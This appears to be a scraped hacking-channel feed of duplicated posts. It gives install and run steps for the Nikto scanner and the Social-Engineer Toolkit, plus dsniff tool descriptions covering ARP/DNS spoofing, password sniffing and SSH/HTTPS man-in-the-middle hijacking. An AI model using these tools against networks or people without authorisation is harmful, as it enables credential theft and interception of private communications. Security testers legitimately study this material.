> git sources▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑2020 updated web server scanner :
🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :
1️⃣git clone https://github.com/sullo/nikto
# Main script is in program/
2️⃣cd nikto/program
# Run using the shebang interpreter
3️⃣./nikto.pl -h http://www.example.com
# Run using perl (if you forget to chmod)
4️⃣perl nikto.pl -h http://www.example.com
🦑Run as a Docker container:
1️⃣git clone https://github.com/sullo/nikto.git
2️⃣cd nikto
3️⃣docker build -t sullo/nikto .
# Call it without arguments to display the full help
4️⃣docker run --rm sullo/nikto
# Basic usage
5️⃣docker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:
6️⃣docker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑2020 updated web server scanner :
🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :
1️⃣git clone https://github.com/sullo/nikto
# Main script is in program/
2️⃣cd nikto/program
# Run using the shebang interpreter
3️⃣./nikto.pl -h http://www.example.com
# Run using perl (if you forget to chmod)
4️⃣perl nikto.pl -h http://www.example.com
🦑Run as a Docker container:
1️⃣git clone https://github.com/sullo/nikto.git
2️⃣cd nikto
3️⃣docker build -t sullo/nikto .
# Call it without arguments to display the full help
4️⃣docker run --rm sullo/nikto
# Basic usage
5️⃣docker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:
6️⃣docker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
GitHub
GitHub - sullo/nikto: Nikto web server scanner
Nikto web server scanner. Contribute to sullo/nikto development by creating an account on GitHub.
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
important hackers terms :
1️⃣arpspoof
redirect packets from a target host (or all hosts) on the LAN
intended for another local host by forging ARP replies. this
is an extremely effective way of sniffing traffic on a switch.
kernel IP forwarding (or a userland program which accomplishes
the same, e.g. fragroute 😄must be turned on ahead of time.
2️⃣dnsspoof
forge replies to arbitrary DNS address / pointer queries on
the LAN. this is useful in bypassing hostname-based access
controls, or in implementing a variety of man-in-the-middle
attacks (HTTP, HTTPS, SSH, Kerberos, etc).
3️⃣dsniff
password sniffer. handles FTP, Telnet, SMTP, HTTP, POP,
poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP
MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ,
Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec
pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL,Net, Sybase
and Microsoft SQL auth info.
4️⃣ dsniff automatically detects and minimally parses each
application protocol, only saving the interesting bits, and
uses Berkeley DB as its output file format, only logging
unique authentication attempts. full TCP/IP reassembly is
provided by libnids(3) (likewise for the following tools as
well).
5️⃣filesnarf
saves selected files sniffed from NFS traffic in the current
working directory.
6️⃣macof
flood the local network with random MAC addresses (causing
some switches to fail open in repeating mode, facilitating
sniffing). a straight C port of the original Perl Net::RawIP
macof program.
7️⃣mailsnarf
a fast and easy way to violate the Electronic Communications
Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs
selected messages sniffed from SMTP and POP traffic in Berkeley
mbox format, suitable for offline browsing with your favorite
mail reader (mail -f, pine, etc.).
8️⃣msgsnarf
record selected messages from sniffed AOL Instant Messenger,
ICQ 2000, IRC, and Yahoo! Messenger chat sessions.
9️⃣sshmitm
SSH monkey-in-the-middle. proxies and sniffs SSH traffic
redirected by dnsspoof(8), capturing SSH password logins, and
optionally hijacking interactive sessions. only SSH protocol
version 1 is (or ever will be) supported - this program is far
too evil already.
🔟sshow
SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2
traffic, identifying authentication attempts, the lengths of
passwords entered in interactive sessions, and command line
lengths.
1️⃣1️⃣tcpkill
kills specified in-progress TCP connections (useful for
libnids-based applications which require a full TCP 3-whs for
TCB creation).
1️⃣2️⃣tcpnice
slow down specified TCP connections via "active" traffic
shaping. forges tiny TCP window advertisements, and optionally
ICMP source quench replies.
1️⃣3️⃣urlsnarf
output selected URLs sniffed from HTTP traffic in CLF
(Common Log Format, used by almost all web servers), suitable
for offline post-processing with your favorite web log
analysis tool (analog, wwwstat, etc.).
1️⃣4️⃣webmitm
HTTP / HTTPS monkey-in-the-middle. transparently proxies and
sniffs web traffic redirected by dnsspoof(8), capturing most
"secure" SSL-encrypted webmail logins and form submissions.
1️⃣5️⃣webspy
sends URLs sniffed from a client to your local Netscape
browser for display, updated in real-time (as the target
surfs, your browser surfs along with them, automagically).
a fun party trick.
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
important hackers terms :
1️⃣arpspoof
redirect packets from a target host (or all hosts) on the LAN
intended for another local host by forging ARP replies. this
is an extremely effective way of sniffing traffic on a switch.
kernel IP forwarding (or a userland program which accomplishes
the same, e.g. fragroute 😄must be turned on ahead of time.
2️⃣dnsspoof
forge replies to arbitrary DNS address / pointer queries on
the LAN. this is useful in bypassing hostname-based access
controls, or in implementing a variety of man-in-the-middle
attacks (HTTP, HTTPS, SSH, Kerberos, etc).
3️⃣dsniff
password sniffer. handles FTP, Telnet, SMTP, HTTP, POP,
poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP
MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ,
Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec
pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL,Net, Sybase
and Microsoft SQL auth info.
4️⃣ dsniff automatically detects and minimally parses each
application protocol, only saving the interesting bits, and
uses Berkeley DB as its output file format, only logging
unique authentication attempts. full TCP/IP reassembly is
provided by libnids(3) (likewise for the following tools as
well).
5️⃣filesnarf
saves selected files sniffed from NFS traffic in the current
working directory.
6️⃣macof
flood the local network with random MAC addresses (causing
some switches to fail open in repeating mode, facilitating
sniffing). a straight C port of the original Perl Net::RawIP
macof program.
7️⃣mailsnarf
a fast and easy way to violate the Electronic Communications
Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs
selected messages sniffed from SMTP and POP traffic in Berkeley
mbox format, suitable for offline browsing with your favorite
mail reader (mail -f, pine, etc.).
8️⃣msgsnarf
record selected messages from sniffed AOL Instant Messenger,
ICQ 2000, IRC, and Yahoo! Messenger chat sessions.
9️⃣sshmitm
SSH monkey-in-the-middle. proxies and sniffs SSH traffic
redirected by dnsspoof(8), capturing SSH password logins, and
optionally hijacking interactive sessions. only SSH protocol
version 1 is (or ever will be) supported - this program is far
too evil already.
🔟sshow
SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2
traffic, identifying authentication attempts, the lengths of
passwords entered in interactive sessions, and command line
lengths.
1️⃣1️⃣tcpkill
kills specified in-progress TCP connections (useful for
libnids-based applications which require a full TCP 3-whs for
TCB creation).
1️⃣2️⃣tcpnice
slow down specified TCP connections via "active" traffic
shaping. forges tiny TCP window advertisements, and optionally
ICMP source quench replies.
1️⃣3️⃣urlsnarf
output selected URLs sniffed from HTTP traffic in CLF
(Common Log Format, used by almost all web servers), suitable
for offline post-processing with your favorite web log
analysis tool (analog, wwwstat, etc.).
1️⃣4️⃣webmitm
HTTP / HTTPS monkey-in-the-middle. transparently proxies and
sniffs web traffic redirected by dnsspoof(8), capturing most
"secure" SSL-encrypted webmail logins and form submissions.
1️⃣5️⃣webspy
sends URLs sniffed from a client to your local Netscape
browser for display, updated in real-time (as the target
surfs, your browser surfs along with them, automagically).
a fun party trick.
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Social-Engineer Toolkit 2020 updated :
🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :
1️⃣
> Linux
>Mac OS X (experimental)
6️⃣Full usage see this pdf-if you beginer :
>
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Social-Engineer Toolkit 2020 updated :
🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :
1️⃣
git clone https://github.com/trustedsec/social-engineer-
2️⃣toolkit/ setoolkit/
3️⃣cd setoolkit
4️⃣pip3 install -r requirements.txt
5️⃣python setup.py
🦑OS :> Linux
>Mac OS X (experimental)
6️⃣Full usage see this pdf-if you beginer :
>
https://github.com/trustedsec/social-engineer-toolkit/raw/master/readme/User_Manual.pdf
@UndercodeTesting@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑A Java based HTTP/HTTPS proxy
> for assessing web application vulnerability.
>It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑A Java based HTTP/HTTPS proxy
> for assessing web application vulnerability.
>It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.
for Windows-Linux-Mac :@UndercodeTesting
> https://sourceforge.net/projects/paros/files/latest/download
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁